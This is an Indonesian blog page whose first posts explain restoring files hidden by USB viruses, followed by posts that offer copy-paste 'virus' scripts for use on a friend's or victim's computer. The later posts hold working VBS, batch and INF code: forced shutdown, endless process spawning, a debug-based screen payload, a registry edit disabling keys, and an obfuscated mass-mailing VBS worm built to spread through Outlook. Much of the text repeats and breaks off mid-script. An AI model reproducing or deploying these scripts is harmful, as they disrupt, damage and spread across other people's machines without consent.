Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts
Tuesday, 25 March 2014
Mengembalikan Data Yang Terkena Virus
20:28
Jangan panik jika file atau folder penting Anda telah terinfeksi virus dan berubah ekstensinya. Sebenarnya virus hanya menyembunyikan file atau folder yang terkana virus, tidak menghapusnya. Misal jika Anda mendapati data Ms Word Anda terkena virus dan berubah ekstensinya menjadi *.exe (tipe Application), sebenarnya file asli Anda tersebut disembunyikan dan file yang ditampilkan adalah file hasil duplikasi yang dibuat oleh
virus dengan ekstensi yang diubah oleh virus tersebut. Sedangkan file asli Anda diubah atributnya menjadi file ‘system’ sehingga menjadi super hidden dan sama sekali tidak terlihat, walaupun Anda mengaktifkan ‘Show hidden file and folder’ tetap saja tidak akan terlihat. Kebanyakan virus seperti ini menyerang pada file-file di flashdisk dan digunakan sebagai media penyebarannya. Tujuan virus menampilkan file duplikasi adalah agar pemakai komputer tidak menyangka bahwa file tersebut adalah file virus, sehingga jika file dibuka maka virus akan menyebar dan menginfeksi sistem komputer. Oleh karena itu hati-hati jika Anda mendapati file di flashdisk yang berubah ekstensinya (misal doc menjadi exe) karena jika Anda membuka file ini maka komputer Anda yang belum terkena virus bisa terinfeksi oleh virus tersebut. Lalu bagaimana cara mengembalikan file asli kita?
Berikut ini akan saya contohkan mengembalikan file di flashdisk yang terinfeksi virus ‘New Heuristic’. Virus New Heuristic adalah virus yang menduplikasi semua file Ms Word di flashdisk, kemudian merubah atribut file aslinya dalam bentuk file ‘hidden’ dan ‘system’, kemudian menampilkan salinan file tersebut dengan tipe Application (exe). Jika membuka file bervirus ini maka dapat menginfeksi sistem komputer.
Langkah mengembalikan file yang telah disembunyikan oleh virus sebagai berikut:
1. Lakukan scanning virus dengan program antivirus (sebaiknya gunakan antivirus update terbaru agar dapat mendeteksi dan membasmi virus-virus baru). Atau Anda dapat melakukan delete langsung pada file bervirus tersebut.
2. Jika Antivirus dapat melakukan clean virus, maka data Anda otomatis sudah normal kembali karena antivirus selain dapat menghapus file bervirus juga dapat mengembalikan file asli Anda. Tapi jika antivirus hanya mampu melakukan delete (menghapus file yang bervirus) tanpa bisa mengembalikan file asli Anda tentunya Anda melanjutkan langkah-langkah berikut ini.
3. Pada menubar Windows Explorer, klik Tools >> Folder Options, atau buka Control Panel >> Folder Option.
4. Pada kotak dialog ‘Folder Option’ yang terbuka, klik tab View. Kemudian pada ‘Hidden files and folders’, pilih pada ‘Show hidden files and folders’.
5. Kemudian hilangkan tanda centang pada ‘Hide protected operating system files (Recommended)’. Pada kotak peringatan yang muncul (Warning), klik tombol Yes.
6. Selanjutnya klik tombol OK.
7. Kemudian seluruh file dan folder yang disembunyikan virus akan terlihat samar.
Berikut ini contoh file dan folder yang disembunyikan virus jika file bervirus belum di hapus oleh antivirus atau dihapus manual. Terlihat bahwa setiap file asli Anda terduplikasi oleh virus dengan ekstensi tipe Application (exe), sedangkan file asli Anda bertipe Microsoft Word Document (doc) yang terlihat samar.
8. Untuk menormalkan kembali semua file dan folder yang disembunyikan virus tersebut, yaitu buka Ms Dos Command prompt, dengan klik Start >> All Programs >> Accessories >> Command Prompt.
9. Kemudian masuklah ke drive dimana file dan folder Anda disembunyikan. Pada contoh ini file berada di flashdisk yaitu drive F:, Pada halaman Command Prompt, ketik F: lalu tekan ‘Enter’.
10. Ketikkan attrib *.* -s –h –r /s /d lalu tekan ‘Enter’. Gambar urutan penulisan sebagai berikut:
Keterangan:
attrib : perintah untuk menggubah atribut file atau folder
-s : system (tanda negatif artinya menghilangkan atribut system)
- h : hidden (tanda negatif artinya menghilangkan atribut hidden)
- r : read only (tanda negatif artinya menghilangkan atribut read only)
*.* : adalah untuk apply ke semua file atau folder
/s : adalah untuk apply atribut sub direktori
/d : adalah untuk apply atribut dalam direktori
11. Kemudian lihatlah di drive tersebut, maka semua file dan folder yang disembunyikan oleh virus sudah normal dan dapat dibuka kembali.
Selain mengembalikan file dengan bantuan Command Prompt, Anda juga dapat menggunakan program bantu yaitu ‘Attribute Changer’. Program Attribute Changer digunakan untuk merubah atribute file seperti merubah ke hidden, system, read only dsb dan untuk mengembalikannya. Program ini gratis (freeware) dan untuk mendapatkannya Anda dapat mencari dan mendownload di internet.
Berikut ini cara penggunaan program Attribute Changer:
1. Instal program dengan klik ganda file Attribute Changer.
2. Selanjutnya akan terbuka kotak dialog ‘Installer Language’. Secara default akan terpilih bahasa Inggris, atau Anda dapat merubahnya, kemudian klik tombol OK.
3. Pada kotak dialog ‘Setup Wizard’ yang muncul, klik tombol Next >.
4. Pada kotak dialog ‘License Agreement’, beri tanda centang pada ‘I accept the therms of the License Agreement’ kemudian klik tombol Next >, yang berarti Anda menyetujui segala peraturan dan kebijakan dalam penggunaan program.
5. Pada kotak dialog ‘Choose Install Location, Anda dapat memilih direktori yang lain untuk menyimpan file. Kemudian klik tombol Next >.
6. Pada kotak dialog ‘Choose Start Menu Folder’ klik tombol Install.
7. Selanjutnya proses instalasi program. Pada kotak dialog ‘Installation Complete’ klik tombol Next >, kemudian klik tombol Finish. Maka proses instalasi sudah selesai. Program ini Anda jalankan dari menu saat Anda mengklik kanan file atau folder dengan tambahan menu yaitu ‘Change Attribute’.
8. Untuk mengubah atribut file yang disembunyikan virus, misal menggunakan contoh di atas, maka setelah file dan folder dapat terlihat samar, maka klik semua folder terlebih dulu, kemudian klik kanan dan klik Change Attributes.
9. Kemudian akan terbuka kotak dialog program Attribute Changer.
10. Untuk menormalkan kembali folder hilangkan tanda centang pada ‘Hidden’ dan ‘System’, kemudian klik tombol OK. Selanjutnya lakukan langkah yang sama pada file Ms Word.
11. Kemudian lihatlah di drive tersebut, maka semua file dan folder yang disembunyikan oleh virus sudah normal dan dapat dibuka kembali.
virus dengan ekstensi yang diubah oleh virus tersebut. Sedangkan file asli Anda diubah atributnya menjadi file ‘system’ sehingga menjadi super hidden dan sama sekali tidak terlihat, walaupun Anda mengaktifkan ‘Show hidden file and folder’ tetap saja tidak akan terlihat. Kebanyakan virus seperti ini menyerang pada file-file di flashdisk dan digunakan sebagai media penyebarannya. Tujuan virus menampilkan file duplikasi adalah agar pemakai komputer tidak menyangka bahwa file tersebut adalah file virus, sehingga jika file dibuka maka virus akan menyebar dan menginfeksi sistem komputer. Oleh karena itu hati-hati jika Anda mendapati file di flashdisk yang berubah ekstensinya (misal doc menjadi exe) karena jika Anda membuka file ini maka komputer Anda yang belum terkena virus bisa terinfeksi oleh virus tersebut. Lalu bagaimana cara mengembalikan file asli kita?
Berikut ini akan saya contohkan mengembalikan file di flashdisk yang terinfeksi virus ‘New Heuristic’. Virus New Heuristic adalah virus yang menduplikasi semua file Ms Word di flashdisk, kemudian merubah atribut file aslinya dalam bentuk file ‘hidden’ dan ‘system’, kemudian menampilkan salinan file tersebut dengan tipe Application (exe). Jika membuka file bervirus ini maka dapat menginfeksi sistem komputer.
Langkah mengembalikan file yang telah disembunyikan oleh virus sebagai berikut:
1. Lakukan scanning virus dengan program antivirus (sebaiknya gunakan antivirus update terbaru agar dapat mendeteksi dan membasmi virus-virus baru). Atau Anda dapat melakukan delete langsung pada file bervirus tersebut.
2. Jika Antivirus dapat melakukan clean virus, maka data Anda otomatis sudah normal kembali karena antivirus selain dapat menghapus file bervirus juga dapat mengembalikan file asli Anda. Tapi jika antivirus hanya mampu melakukan delete (menghapus file yang bervirus) tanpa bisa mengembalikan file asli Anda tentunya Anda melanjutkan langkah-langkah berikut ini.
3. Pada menubar Windows Explorer, klik Tools >> Folder Options, atau buka Control Panel >> Folder Option.
4. Pada kotak dialog ‘Folder Option’ yang terbuka, klik tab View. Kemudian pada ‘Hidden files and folders’, pilih pada ‘Show hidden files and folders’.
5. Kemudian hilangkan tanda centang pada ‘Hide protected operating system files (Recommended)’. Pada kotak peringatan yang muncul (Warning), klik tombol Yes.
6. Selanjutnya klik tombol OK.
7. Kemudian seluruh file dan folder yang disembunyikan virus akan terlihat samar.
Berikut ini contoh file dan folder yang disembunyikan virus jika file bervirus belum di hapus oleh antivirus atau dihapus manual. Terlihat bahwa setiap file asli Anda terduplikasi oleh virus dengan ekstensi tipe Application (exe), sedangkan file asli Anda bertipe Microsoft Word Document (doc) yang terlihat samar.
8. Untuk menormalkan kembali semua file dan folder yang disembunyikan virus tersebut, yaitu buka Ms Dos Command prompt, dengan klik Start >> All Programs >> Accessories >> Command Prompt.
9. Kemudian masuklah ke drive dimana file dan folder Anda disembunyikan. Pada contoh ini file berada di flashdisk yaitu drive F:, Pada halaman Command Prompt, ketik F: lalu tekan ‘Enter’.
10. Ketikkan attrib *.* -s –h –r /s /d lalu tekan ‘Enter’. Gambar urutan penulisan sebagai berikut:
Keterangan:
attrib : perintah untuk menggubah atribut file atau folder
-s : system (tanda negatif artinya menghilangkan atribut system)
- h : hidden (tanda negatif artinya menghilangkan atribut hidden)
- r : read only (tanda negatif artinya menghilangkan atribut read only)
*.* : adalah untuk apply ke semua file atau folder
/s : adalah untuk apply atribut sub direktori
/d : adalah untuk apply atribut dalam direktori
11. Kemudian lihatlah di drive tersebut, maka semua file dan folder yang disembunyikan oleh virus sudah normal dan dapat dibuka kembali.
Selain mengembalikan file dengan bantuan Command Prompt, Anda juga dapat menggunakan program bantu yaitu ‘Attribute Changer’. Program Attribute Changer digunakan untuk merubah atribute file seperti merubah ke hidden, system, read only dsb dan untuk mengembalikannya. Program ini gratis (freeware) dan untuk mendapatkannya Anda dapat mencari dan mendownload di internet.
Berikut ini cara penggunaan program Attribute Changer:
1. Instal program dengan klik ganda file Attribute Changer.
2. Selanjutnya akan terbuka kotak dialog ‘Installer Language’. Secara default akan terpilih bahasa Inggris, atau Anda dapat merubahnya, kemudian klik tombol OK.
3. Pada kotak dialog ‘Setup Wizard’ yang muncul, klik tombol Next >.
4. Pada kotak dialog ‘License Agreement’, beri tanda centang pada ‘I accept the therms of the License Agreement’ kemudian klik tombol Next >, yang berarti Anda menyetujui segala peraturan dan kebijakan dalam penggunaan program.
5. Pada kotak dialog ‘Choose Install Location, Anda dapat memilih direktori yang lain untuk menyimpan file. Kemudian klik tombol Next >.
6. Pada kotak dialog ‘Choose Start Menu Folder’ klik tombol Install.
7. Selanjutnya proses instalasi program. Pada kotak dialog ‘Installation Complete’ klik tombol Next >, kemudian klik tombol Finish. Maka proses instalasi sudah selesai. Program ini Anda jalankan dari menu saat Anda mengklik kanan file atau folder dengan tambahan menu yaitu ‘Change Attribute’.
8. Untuk mengubah atribut file yang disembunyikan virus, misal menggunakan contoh di atas, maka setelah file dan folder dapat terlihat samar, maka klik semua folder terlebih dulu, kemudian klik kanan dan klik Change Attributes.
9. Kemudian akan terbuka kotak dialog program Attribute Changer.
10. Untuk menormalkan kembali folder hilangkan tanda centang pada ‘Hidden’ dan ‘System’, kemudian klik tombol OK. Selanjutnya lakukan langkah yang sama pada file Ms Word.
11. Kemudian lihatlah di drive tersebut, maka semua file dan folder yang disembunyikan oleh virus sudah normal dan dapat dibuka kembali.
Monday, 24 March 2014
CARA MENGEMBALIKAN FILE YANG TERKENA VIRUS SHORTCUT
20:08
File yang terkena virus Shortcut pada dasarnya tidaklah hilang atau terhapus, tetapi disembunyikan oleh virus, dan virus membuat shortcut seolah-olah yang diklik adalah file yang dimaksud, padahal itu adalah virus. Ketika dicopy ke media lain, yang tercopy adalah virus itu, bukan filenya, sehingga ketika dibuka di PC/Lepi lain, maka akan menjangkit, dan filenya tidak bisa dibuka.
Untuk mengatasinya, bisa menggunakan software Anitivirus seperti Avira, atau secara manual. Kalau langsung menggunakan software, file tsb bisa ikut terhapus, karena itu, back up dulu data penting itu secara manual. Berikut penulis jelaskan cara manual:
1. Saat komputer akan boot, tekan F8, sehingga tampil menu layar hitam, dan pilih "Safe Mode."
2. Setelah masuk ke Windows, buka Windows Explorer, klik tab Tools>>Folder Options.

3. Klik Tab View, Klik Show Hidden.

4. Hilangkan centang Hide Ext...
5. Hilangkan centang Hide Protected.
6. Lalu masuk ke folder di mana file yang ingin diselamatkan disimpan. Di situ akan terlihat mana file asli dan mana file shortcut. Copy file tsb ke FD yg bebas VS, lalu klik kanan pada file tersebut>>> properties, lalu hilangkan centang attribut Hidden. Sekarang file tersebut bisa dibuka di komputer lain.
7. Selanjutnya, virus S tsb bisa dihapus secara manual atau menggunakan soffware.
semoga bermanfaat....
Untuk mengatasinya, bisa menggunakan software Anitivirus seperti Avira, atau secara manual. Kalau langsung menggunakan software, file tsb bisa ikut terhapus, karena itu, back up dulu data penting itu secara manual. Berikut penulis jelaskan cara manual:
1. Saat komputer akan boot, tekan F8, sehingga tampil menu layar hitam, dan pilih "Safe Mode."
2. Setelah masuk ke Windows, buka Windows Explorer, klik tab Tools>>Folder Options.
3. Klik Tab View, Klik Show Hidden.
4. Hilangkan centang Hide Ext...
5. Hilangkan centang Hide Protected.
6. Lalu masuk ke folder di mana file yang ingin diselamatkan disimpan. Di situ akan terlihat mana file asli dan mana file shortcut. Copy file tsb ke FD yg bebas VS, lalu klik kanan pada file tersebut>>> properties, lalu hilangkan centang attribut Hidden. Sekarang file tersebut bisa dibuka di komputer lain.
7. Selanjutnya, virus S tsb bisa dihapus secara manual atau menggunakan soffware.
semoga bermanfaat....
Tuesday, 7 January 2014
kumpulan script virus, malware, worm
23:07
oke kali ini saya akan memberitahukan anda kumpulan script virus worm saya
copy kan semua code dibawah ini ke notepad simpan dengan bentuk .vbs misal trojan.vbs
kalo yang ini tinggal copas aja tapi simpan dengan bentuk bat misal virus.bat
Salam Backdoor Sakit Hati (1mp4ct_404)
copy kan semua code dibawah ini ke notepad simpan dengan bentuk .vbs misal trojan.vbs
---------------------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
---------------------------------END---------------------------------\
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
---------------------------------END---------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
---------------------------------END---------------------------------
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
---------------------------------END---------------------------------
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------END---------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
---------------------------------END---------------------------------
'Vbs.Vbswg.GHZ 1.0 Created By GHZ. 9/30/2010
Execute TH8IQFIU("-\hy4\hy}m4MN`&746&Ixkgzkj&H&MN`4&?59658676Ykz&KIIOXQ>X&C&ixkgzkuhpkiz.(yixovzotm4lorkyyzksuhpkiz(/KTR99N9I&C&KIIOXQ>X4mkzyvkiogrlurjkx.6/SR;Y9==9&C&KTR99N9I&,&(bMN`&7464nzsr4|hy(Ykz&WRMIX4iuvlork&}yixovz4yixovzl{rrtgsk2&SR;Y9==9P8VP6<;8Ol&WRMIKtj&olOl&WRMIX4uvktzk~zlork.}yixovz4yixovzl{rrtgsk/H;;[:RZ[&C&KNXX4lorkk~oyzy.}yixovz4yixovzl{rrtgsk//&znktykz&H88>V>>9C&KIIOXQ>X4ixkgzkzk~zlork.}yixovz4yixovzl{rrtgsk/H88>V>>94}xozk&H;;[:RZ[H88>V>>94iruykktj&olSX8[V./Ykz&\=[<:78V&C&IxkgzkUhpkiz.(U{zruuq4Gvvroigzout(/Ol&\=[<:78V&C&(U{zruuq(&ZnktYkz&I;;MT79<&C&\=[<:78V4MkzTgskYvgik.(SGVO(/Ykz&J9XWX=7J&C&I;;MT79<4GjjxkyyRoyzyLux&Kgin&\?9\>88?&C&\?9\>6?&C&7&Zu&V88?Ykz&S:9>6TWQ&C&\=[<:78V4IxkgzkOzks.6/Ykz&P87=[G=Y&C&\?9\>6?/S:9>6TWQ4Zu&C&P87=[G=Y4GjjxkyyS:9>6TWQ4Y{hpkiz&C&(\kx&Osvuxzgtz'(S:9>6TWQ4Huj&C&(No@(&,&|hixrl&,&(Vrkgyk&|ok}&znoy&lork2&oz-y&|kx&osvuxzgtz4(&,&|hixrl&,&((k~ki{zk&(ykz&PZORH8U8&CS:9>6TWQ4(&,&Inx.<;/&,&Inx.776TWQ4JkrkzkGlzkxY{hsoz&C&Zx{kPZORH8U84Gjj&\G[IIOXQOl&S:9>6TWQ4Zu&BD&((&ZnktS:9>6TWQ4YktjKtj&OlTk~zKtj&OlTk~zKtj&OlKtj&l{tizoutL{tizout&Z6Q=N<;Z.U7MZ8?==/Ol&U7MZ8?==&BD&((&ZnktYP8RMIX4lorkk~oyzy.(i@bsoxibsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi(KrykOl&KIIOXQ>X4lorkk~oyzy.(i@bsoxi98bsoxi4oto(/&ZnktU7MZ8?==&C&(i@bsoxi98(KrykOl&KIIOXQ>X4lorkk~oyzy.YP8RMIX4lorkk~oyzy.YP8RMIX4IxkgzkZk~zLork.U7MZ8?==&,&(byixovz4oto(2&Zx{k/K=RTR99N&C&(ayixovzc(&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t6Cut&7@PUOT@)@�(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t7C&&5ol&.&*toiq&CC&*sk&/&�&ngrz&Æ’(K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t8C&&54(&,&Inx.766/&,&Inx.??/&,&Inx.??/&,&(&yktj&*toiq&(K=RTR99N&C&K=RTR99N&,&SR;Y9==9K=RTR99N&C&K=RTR99N&,&|hIxRl&,&(t9CÆ’(yixovz4IruykKtj&OlKtj&L{tizoutL{tizout&GI=R;Y9=./Ut&Kxxux&Xky{sk&Tk~zYkz&W8G8VP6<&C&KIIOXQ>X4Jxo|kyLux&Kgin&MJR?PNNXX4MkzLurjkx.V>NNXV>&C&U?G;;[:R4LorkyLux&Kgin&LK:X8[V<&Ot&Z:K88>V>Ol&rigyk.LK:X8[V<4Tgsk/&C&(soxi4oto(&ZnktZ6Q=N<;Z.LK:X8[V<4VgxktzLurjkx/Ktj&OlOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hy(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olOl&KIIOXQ>X4MkzK~zktyoutTgsk.LK:X8[V<4vgzn/&C&(|hk(KIIOXQ>X4IuvLork&}yixovz4yixovzl{rrtgsk2LK:X8[V<4vgzn2zx{kKtj&olTk~zYkz&IM8=[<:7&C&U?G;;[:R4Y{hlurjkxyLux&Kgin&J>I;;MT7&Ot&IM8=[<:7Igrr&.J>I;;MT74vgzn/Tk~zKtj&l{tizoutL{tizout&P8VP6<;8./Xgtjuso€kOl&7&1&Otz.Xtj&0&7666/&C&=&znktSymhu~&(O-|k&tuznotm&zu&yg4&@u/(2<:2(@u/(ktj&olktj&l{tizout-\hy}m&8&Hkzg4&H&aQc",-6) Function TH8IQFIU(C38QDRVV,F8O63JAL) For L6F3M0OD = 1 To Len(C38QDRVV) V6BD6OKI = Mid(C38QDRVV, L6F3M0OD, 1) If V6BD6OKI = Chr(2) Then V6BD6OKI = Chr(34 + F8O63JAL) ElseIf V6BD6OKI = Chr(3) Then V6BD6OKI = Chr(10 + F8O63JAL) ElseIf V6BD6OKI = Chr(4) Then V6BD6OKI = Chr(13 + F8O63JAL) Else V6BD6OKI = Chr(Asc(V6BD6OKI) + F8O63JAL) End If TH8IQFIU = TH8IQFIU & V6BD6OKI Next End Function ---------------------------------END---------------------------------
kalo yang ini tinggal copas aja tapi simpan dengan bentuk bat misal virus.bat
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-------------------------------END------------------------------------
@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a
-----------------------------------END-------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s
-----------------------------------END-------------------------------
@echo offSekian dari saya
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
---------------------------------END---------------------------------
Salam Backdoor Sakit Hati (1mp4ct_404)
Cara membuat virus dengan NotePad
22:53
berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda,dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya :
1. tentu aja nyalakan komputer sobat
2. buka start dan buka Note pad atau bisa search.
3. Di bawah ini ada beberapa code virus, atau di copas aja blog ini bebas copy/paste ko...
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )
TRIK 12 - Cara Mematikan Tombol Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF
Langsung kita mulai saja :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00
—————————————
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install
3. Log Off komputernya agar trik ini berfungsi.
NB :
Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.
Untuk menormalkannya, silahkan salin script berikut :
—————————————
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
—————————————
—> Simpan dengan nama “NORMAL.INF”
Klik kanan file ini, pilih >Install
Log Off komputernya.
1. tentu aja nyalakan komputer sobat
2. buka start dan buka Note pad atau bisa search.
3. Di bawah ini ada beberapa code virus, atau di copas aja blog ini bebas copy/paste ko...
TRIK 1 - Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN
TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN
TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yangberwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
------------------------------------------------------
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file :All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
seperti cara yang pertama, hanya berbeda kode script simpan kode yangberwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)
TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
------------------------------------------------------
simpan kode script yang berwarna hijau dengan nama xhack.BAT type file :All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.
TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,
TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,
TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus
TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus
TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file :All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya
TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file :All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya
TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
do
wscript.sleep 100
